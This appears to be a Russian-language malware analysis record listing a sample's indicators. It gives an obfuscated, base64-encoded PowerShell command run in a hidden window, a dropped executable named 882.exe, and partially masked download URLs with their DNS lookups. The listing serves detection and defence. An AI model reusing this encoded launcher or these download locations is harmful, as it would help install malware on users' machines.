Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAFkASwBCAFcAeQBuAHQAPQAnAFUAQQBLAE8AUABxAGIAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAFUAUgBpAHQAYAB5AHAAUgBvAHQATwBgAEMAYABPAGwAIgAgAD...
- %HOMEPATH%\882.exe
- %HOMEPATH%\882.exe
- http://st###arc.com/assets/hoTVnj/
- http://so####ffairs.net/logs/yzht756773/
- http://su####vithomes.com/sathorncondos.com/N6dWb36edu55270418/
- http://ad#####rightslaw.org/yaook/ran/
- http://li###eart.co.jp/img/qyH/
- DNS ASK st###arc.com
- DNS ASK so####ffairs.net
- DNS ASK su####vithomes.com
- DNS ASK ad#####rightslaw.org
- DNS ASK ad#####rightslaw.com
- DNS ASK li###eart.co.jp
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAFkASwBCAFcAeQBuAHQAPQAnAFUAQQBLAE8AUABxAGIAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAFUAUgBpAHQAYAB5AHAAUgBvAHQATwBgAEMAYABPAGwAIgAgAD...' (со скрытым окном)